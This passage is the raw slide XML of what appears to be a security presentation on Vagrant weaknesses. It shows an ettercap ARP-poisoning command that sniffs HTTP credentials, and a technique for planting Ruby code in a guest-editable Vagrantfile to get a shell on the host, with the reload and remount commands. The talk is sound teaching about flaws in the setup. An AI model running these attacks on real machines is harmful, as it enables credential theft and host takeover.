              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-185" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Sniffing*</a:t>
            </a:r>
            <a:endParaRPr sz="110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  <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>root@vagrant-ubuntu-precise-64:~# ettercap -q -i eth1 -T -M arp:remote ///  ettercap NG-0.7.4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>2001-2005 ALoR &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>NaGA</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>HTTP : 192.168.1.20:80 -&gt; USER: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>bob </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>PASS: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>secret </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>INFO:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="50" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>bob/admin/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592" y="2662224"/>
            <a:ext cx="179641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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network.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52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17" y="190436"/>
            <a:ext cx="2183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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-160" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SHARED</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>FOLDERS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465" y="906424"/>
            <a:ext cx="974090" cy="187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3040">
              <a:lnSpc>
                <a:spcPct val="137800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Folders </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Defaults </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6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D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Exploitation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spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Recommendations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7198" y="968629"/>
            <a:ext cx="0" cy="1832610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1832610">
                <a:moveTo>
                  <a:pt x="0" y="183222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10613" y="1605457"/>
            <a:ext cx="13887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65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SHARED</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-280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sz="1400" spc="-155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FOLDERS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53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589" y="190436"/>
            <a:ext cx="2211705" cy="716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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-160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SHARED</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-254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sz="1200" spc="-155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FOLDERS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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Overview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792" y="1267228"/>
            <a:ext cx="1527175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110" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-185" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>folder:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>shared by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default</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>contains the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Vagrantfile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2580" y="1367790"/>
            <a:ext cx="0" cy="996950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="996950">
                <a:moveTo>
                  <a:pt x="0" y="99656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97582" y="1267228"/>
            <a:ext cx="1941195" cy="10756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150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Vagrantfile:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>edited </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by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guest</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is written </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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ruby</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>commands </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on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host</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reloaded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by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guest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54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89" y="190436"/>
            <a:ext cx="3503295" cy="274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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-160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SHARED</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215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sz="1200" spc="-155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FOLDERS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865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Low </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-165" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Host)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"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="353060" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="353695" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Planting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Into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Vagrantfile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E20074"/>
              </a:buClr>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
            </a:pPr>
            <a:endParaRPr sz="950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="1426845">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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# Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Low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Privilege Shell on Host  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>system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(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”id &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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user-id”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)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="353060" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="353695" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reloading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Vagrantfile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E20074"/>
              </a:buClr>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
            </a:pPr>
            <a:endParaRPr sz="10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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="353060" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="353695" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remount </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant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-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Share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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>mount </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-t vboxsf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>/vagrant</a:t>
            </a:r>
            <a:endParaRPr sz="900">
